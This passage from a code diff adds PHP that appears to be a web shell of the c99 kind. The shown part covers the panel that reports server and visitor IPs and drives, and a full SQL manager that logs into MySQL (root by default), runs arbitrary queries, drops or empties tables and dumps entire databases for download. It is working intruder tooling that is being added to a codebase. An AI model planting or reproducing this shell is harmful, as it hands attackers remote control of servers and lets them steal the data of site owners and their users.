+ $wdt = "<font color=green>[ ok ]</font>"; 
+ echo "<b><font color=green>".view_perms(fileperms($d))."</font></b>"; 
+} 
+else 
+{ 
+ $wd = FALSE; 
+ $wdt = "<font color=red>[ Read-Only ]</font>"; 
+ echo "<b>".view_perms_color($d)."</b>"; 
+} 
+if (is_callable("disk_free_space")) 
+{ 
+ $free = disk_free_space($d); 
+ $total = disk_total_space($d); 
+ if ($free === FALSE) {$free = 0;} 
+ if ($total === FALSE) {$total = 0;} 
+ if ($free < 0) {$free = 0;} 
+ if ($total < 0) {$total = 0;} 
+ $used = $total-$free; 
+ $free_percent = round(100/($total/$free),2); 
+ echo "<br><b>Free ".view_size($free)." of ".view_size($total)." (".$free_percent."%)</b>"; 
+} 
+echo "<br>";
+echo "<b>Your ip: <a href=http://whois.domaintools.com/".$_SERVER["REMOTE_ADDR"].">".$_SERVER["REMOTE_ADDR"]."</a> - Server ip: <a href=http://whois.domaintools.com/".gethostbyname($_SERVER["HTTP_HOST"]).">".gethostbyname($_SERVER["HTTP_HOST"])."</a></b><br/>"; 
+$letters = ""; 
+if ($win) 
+{ 
+ $v = explode("\\",$d); 
+ $v = $v[0]; 
+ foreach (range("a","z") as $letter) 
+ { 
+  $bool = $isdiskette = in_array($letter,$safemode_diskettes); 
+  if (!$bool) {$bool = is_dir($letter.":\\");} 
+  if ($bool) 
+  { 
+   $letters .= "<a href=\"".$surl."act=ls&d=".urlencode($letter.":\\")."\"".($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly, otherwise an error may occur.')\"":"").">[ "; 
+   if ($letter.":" != $v) {$letters .= $letter;} 
+   else {$letters .= "<font color=green>".$letter."</font>";} 
+   $letters .= " ]</a> "; 
+  } 
+ } 
+ if (!empty($letters)) {echo "<b>Detected drives</b>: ".$letters."<br>";} 
+} 
+if (count($quicklaunch) > 0) 
+{ 
+ foreach($quicklaunch as $item) 
+ { 
+  $item[1] = str_replace("%d",urlencode($d),$item[1]); 
+  $item[1] = str_replace("%sort",$sort,$item[1]); 
+  $v = realpath($d.".."); 
+  if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);} 
+  $item[1] = str_replace("%upd",urlencode($v),$item[1]); 
+  echo "<a href=\"".$item[1]."\">".$item[0]."</a>&nbsp;&nbsp;&nbsp;&nbsp;"; 
+ } 
+} 
+echo "</p></td></tr></table><br>"; 
+if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">".$donated_html."</td></tr></table><br>";} 
+echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">"; 
+if ($act == "") {$act = $dspact = "ls";} 
+if ($act == "sql") 
+{ 
+ $sql_surl = $surl."act=sql"; 
+ if ($sql_login)  {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);} 
+ if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);} 
+ if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);} 
+ if ($sql_port)   {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);} 
+ if ($sql_db)     {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);} 
+ $sql_surl .= "&"; 
+ ?><h3>Attention! SQL-Manager is <u>NOT</u> ready module! Don't reports bugs.</h3><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgcolor=#000000 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="100%" height="1" colspan="2" valign="top"><center><?php 
+ if ($sql_server) 
+ { 
+  $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd); 
+  $err = mysql_smarterror(); 
+  @mysql_select_db($sql_db,$sql_sock); 
+  if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();} 
+ } 
+ else {$sql_sock = FALSE;} 
+ echo "<b>SQL Manager:</b><br>"; 
+ if (!$sql_sock) 
+ { 
+  if (!$sql_server) {echo "NO CONNECTION";} 
+  else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";} 
+ } 
+ else 
+ { 
+  $sqlquicklaunch = array(); 
+  $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"); 
+  $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)); 
+  $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus"); 
+  $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars"); 
+  $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes"); 
+  $sqlquicklaunch[] = array("Logout",$surl."act=sql"); 
+  echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>"; 
+  if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><b>".$item[0]."</b></a> ] ";}} 
+  echo "</center>"; 
+ } 
+ echo "</td></tr><tr>"; 
+ if (!$sql_sock) {?><td width="28%" height="100" valign="top"><center><font size="5"> i </font></center><li>If login is null, login is owner of process.<li>If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width="90%" height="1" valign="top"><TABLE height=1 cellSpacing=0 cellPadding=0 width="100%" border=0><tr><td>&nbsp;<b>Please, fill the form:</b><table><tr><td><b>Username</b></td><td><b>Password</b>&nbsp;</td><td><b>Database</b>&nbsp;</td></tr><form action="<?php echo $surl; ?>" method="POST"><input type="hidden" name="act" value="sql"><tr><td><input type="text" name="sql_login" value="root" maxlength="64"></td><td><input type="password" name="sql_passwd" value="" maxlength="64"></td><td><input type="text" name="sql_db" value="" maxlength="64"></td></tr><tr><td><b>Host</b></td><td><b>PORT</b></td></tr><tr><td align=right><input type="text" name="sql_server" value="localhost" maxlength="64"></td><td><input type="text" name="sql_port" value="3306" maxlength="6" size="3"></td><td><input type="submit" value="Connect"></td></tr><tr><td></td></tr></form></table></td><?php } 
+ else 
+ { 
+  //Start left panel 
+  if (!empty($sql_db)) 
+  { 
+   ?><td width="25%" height="100%" valign="top"><a href="<?php echo $surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade><?php 
+   $result = mysql_list_tables($sql_db); 
+   if (!$result) {echo mysql_smarterror();} 
+   else 
+   { 
+    echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>"; 
+    $c = 0; 
+    while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>+&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;} 
+    if (!$c) {echo "No tables found in database.";} 
+   } 
+  } 
+  else 
+  { 
+   ?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade><?php 
+   $result = mysql_list_dbs($sql_sock); 
+   if (!$result) {echo mysql_smarterror();} 
+   else 
+   { 
+    ?><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php 
+    $c = 0; 
+    $dbs = ""; 
+    while ($row = mysql_fetch_row($result)) {$dbs .= "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= ">".$row[0]."</option>"; $c++;} 
+    echo "<option value=\"\">Databases (".$c.")</option>"; 
+    echo $dbs; 
+   } 
+   ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form><?php 
+  } 
+  //End left panel 
+  echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">"; 
+  //Start center panel 
+  $diplay = TRUE; 
+  if ($sql_db) 
+  { 
+   if (!is_numeric($c)) {$c = 0;} 
+   if ($c == 0) {$c = "no";} 
+   echo "<hr size=\"1\" noshade><center><b>There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").<br>"; 
+   if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}} 
+   echo "</b></center>"; 
+   $acts = array("","dump"); 
+   if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} 
+   elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";} 
+   elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";} 
+   elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} 
+   elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} 
+   elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} 
+   elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} 
+   elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";} 
+   elseif ($sql_tbl_act == "insert") 
+   { 
+    if ($sql_tbl_insert_radio == 1) 
+    { 
+     $keys = ""; 
+     $akeys = array_keys($sql_tbl_insert); 
+     foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";} 
+     if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);} 
+     $values = ""; 
+     $i = 0; 
+     foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;} 
+     if (!empty($values)) {$values = substr($values,0,strlen($values)-2);} 
+     $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );"; 
+     $sql_act = "query"; 
+     $sql_tbl_act = "browse"; 
+    } 
+    elseif ($sql_tbl_insert_radio == 2) 
+    { 
+     $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs); 
+     $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;"; 
+     $result = mysql_query($sql_query) or print(mysql_smarterror()); 
+     $result = mysql_fetch_array($result, MYSQL_ASSOC); 
+     $sql_act = "query"; 
+     $sql_tbl_act = "browse"; 
+    } 
+   } 
+   if ($sql_act == "query") 
+   { 
+    echo "<hr size=\"1\" noshade>"; 
+    if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";} 
+    if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} 
+    if ((!$submit) or ($sql_act)) {echo "<table border=\"0\" width=\"100%\" height=\"1\"><tr><td><form action=\"".$sql_surl."\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\">&nbsp;<input type=\"submit\" value=\"No\"></form></td></tr></table>";} 
+   } 
+   if (in_array($sql_act,$acts)) 
+   { 
+    ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>Dump DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>">&nbsp;<input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php 
+    if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";} 
+    if ($sql_act == "newtbl") 
+    { 
+     echo "<b>"; 
+     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>"; 
+    } 
+    else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();} 
+   } 
+   elseif ($sql_act == "dump") 
+   { 
+    if (empty($submit)) 
+    { 
+     $diplay = FALSE; 
+     echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>"; 
+     echo "<b>DB:</b>&nbsp;<input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>"; 
+     $v = join (";",$dmptbls); 
+     echo "<b>Only tables (explode \";\")&nbsp;<b><sup>1</sup></b>:</b>&nbsp;<input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>"; 
+     if ($dump_file) {$tmp = $dump_file;} 
+     else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");} 
+     echo "<b>File:</b>&nbsp;<input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>"; 
+     echo "<b>Download: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>"; 
+     echo "<b>Save to file: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>"; 
+     echo "<br><br><input type=\"submit\" name=\"submit\" value=\"Dump\"><br><br><b><sup>1</sup></b> - all, if empty"; 
+     echo "</form>"; 
+    } 
+    else 
+    { 
+     $diplay = TRUE; 
+     $set = array(); 
+     $set["sock"] = $sql_sock; 
+     $set["db"] = $sql_db; 
+     $dump_out = "download"; 
+     $set["print"] = 0; 
+     $set["nl2br"] = 0; 
+     $set[""] = 0; 
+     $set["file"] = $dump_file; 
+     $set["add_drop"] = TRUE; 
+     $set["onlytabs"] = array(); 
+     if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);} 
+     $ret = mysql_dump($set); 
+     if ($sql_dump_download) 
+     { 
+      @ob_clean(); 
+      header("Content-type: application/octet-stream"); 
+      header("Content-length: ".strlen($ret)); 
+      header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";"); 
+      echo $ret; 
+      exit; 
+     } 
+     elseif ($sql_dump_savetofile) 
+     { 
+      $fp = fopen($sql_dump_file,"w"); 
+      if (!$fp) {echo "<b>Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";} 
+      else 
+      { 
+       fwrite($fp,$ret); 
+       fclose($fp); 
+       echo "<b>Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>."; 
+      } 
+     } 
+     else {echo "<b>Dump: nothing to do!</b>";} 
+    } 
+   } 
+   if ($diplay) 
+   { 
+    if (!empty($sql_tbl)) 
+    { 
+     if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";} 
+     $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;"); 
+     $count_row = mysql_fetch_array($count); 
+     mysql_free_result($count); 
+     $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;"); 
+     $tbl_struct_fields = array(); 
+     while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;} 
+     if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;} 
+     if (empty($sql_tbl_page)) {$sql_tbl_page = 0;} 
+     if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;} 
+     if (empty($sql_tbl_le)) {$sql_tbl_le = 30;} 
+     $perpage = $sql_tbl_le - $sql_tbl_ls; 
+     if (!is_numeric($perpage)) {$perpage = 10;} 
+     $numpages = $count_row[0]/$perpage; 
+     $e = explode(" ",$sql_order); 
+     if (count($e) == 2) 
+     { 
+      if ($e[0] == "d") {$asc_desc = "DESC";} 
+      else {$asc_desc = "ASC";} 
+      $v = "ORDER BY `".$e[1]."` ".$asc_desc." "; 
+     } 
+     else {$v = "";} 
+     $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage.""; 
+     $result = mysql_query($query) or print(mysql_smarterror()); 
+     echo "<hr size=\"1\" noshade><center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>"; 
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=structure\">[&nbsp;<b>Structure</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; 
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=browse\">[&nbsp;<b>Browse</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; 
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_act=tbldump&thistbl=1\">[&nbsp;<b>Dump</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; 
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=insert\">[&nbsp;<b>Insert</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; 
+     if ($sql_tbl_act == "structure") {echo "<br><br><b>Coming sooon!</b>";} 
+     if ($sql_tbl_act == "insert") 
+     { 
+      if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();} 
+      if (!empty($sql_tbl_insert_radio)) 
+      { 
+
+      } 
+      else 
+      { 
+       echo "<br><br><b>Inserting row into table:</b><br>"; 
+       if (!empty($sql_tbl_insert_q)) 
+       { 
+        $sql_query = "SELECT * FROM `".$sql_tbl."`"; 
+        $sql_query .= " WHERE".$sql_tbl_insert_q; 
+        $sql_query .= " LIMIT 1;"; 
+        $result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror()); 
+        $values = mysql_fetch_assoc($result); 
+        mysql_free_result($result); 
+       } 
+       else {$values = array();} 
+       echo "<form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1><tr><td><b>Field</b></td><td><b>Type</b></td><td><b>Function</b></td><td><b>Value</b></td></tr>"; 
+       foreach ($tbl_struct_fields as $field) 
+       { 
+        $name = $field["Field"]; 
+        if (empty($sql_tbl_insert_q)) {$v = "";} 
+        echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>"; 
+        $i++; 
+       } 
+       echo "</table><br>"; 
+       echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>"; 
+       if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";} 
+       echo "<br><br><input type=\"submit\" value=\"Confirm\"></form>"; 
+      } 
+     } 
+     if ($sql_tbl_act == "browse") 
+     { 
+      $sql_tbl_ls = abs($sql_tbl_ls); 
+      $sql_tbl_le = abs($sql_tbl_le); 
+      echo "<hr size=\"1\" noshade>"; 
+      echo "<img src=\"".$surl."act=img&img=multipage\" height=\"12\" width=\"10\" alt=\"Pages\">&nbsp;"; 
+      $b = 0; 
+      for($i=0;$i<$numpages;$i++) 
+      { 
+       if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."\"><u>";} 
+       echo $i; 
+       if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";} 
+       if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";} 
+       else {echo "&nbsp;";} 
+      } 
+      if ($i == 0) {echo "empty";} 
+      echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\">&nbsp;<input type=\"submit\" value=\"View\"></form>"; 
+      echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgcolor=#000000 borderColorLight=#c0c0c0 border=1>"; 
+      echo "<tr>"; 
+      echo "<td><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></td>"; 
+      for ($i=0;$i<mysql_num_fields($result);$i++) 
+      { 
+       $v = mysql_field_name($result,$i); 
+       if ($e[0] == "a") {$s = "d"; $m = "asc";} 
+       else {$s = "a"; $m = "desc";} 
+       echo "<td>"; 
+       if (empty($e[0])) {$e[0] = "a";} 
+       if ($e[1] != $v) {echo "<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0]."%20".$v."\"><b>".$v."</b></a>";} 
+       else {echo "<b>".$v."</b><a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."\"><img src=\"".$surl."act=img&img=sort_".$m."\" height=\"9\" width=\"14\" alt=\"".$m."\"></a>";} 
+       echo "</td>"; 
+      } 
+      echo "<td><font color=\"green\"><b>Action</b></font></td>"; 
+      echo "</tr>"; 
+      while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) 
+      { 
+       echo "<tr>"; 
+       $w = ""; 
+       $i = 0; 
+       foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;} 
+       if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);} 
+       echo "<td><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>"; 
+       $i = 0; 
+       foreach ($row as $k=>$v) 
+       { 
+        $v = htmlspecialchars($v); 
+        if ($v == "") {$v = "<font color=\"green\">NULL</font>";} 
+        echo "<td>".$v."</td>"; 
+        $i++; 
+       } 
+       echo "<td>"; 
+       echo "<a href=\"".$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_query=".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Delete\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;"; 
+       echo "<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_insert_q=".urlencode($w)."\"><img src=\"".$surl."act=img&img=change\" alt=\"Edit\" height=\"14\" width=\"14\" border=\"0\"></a>&nbsp;"; 
+       echo "</td>"; 
+       echo "</tr>"; 
+      } 
+      mysql_free_result($result); 
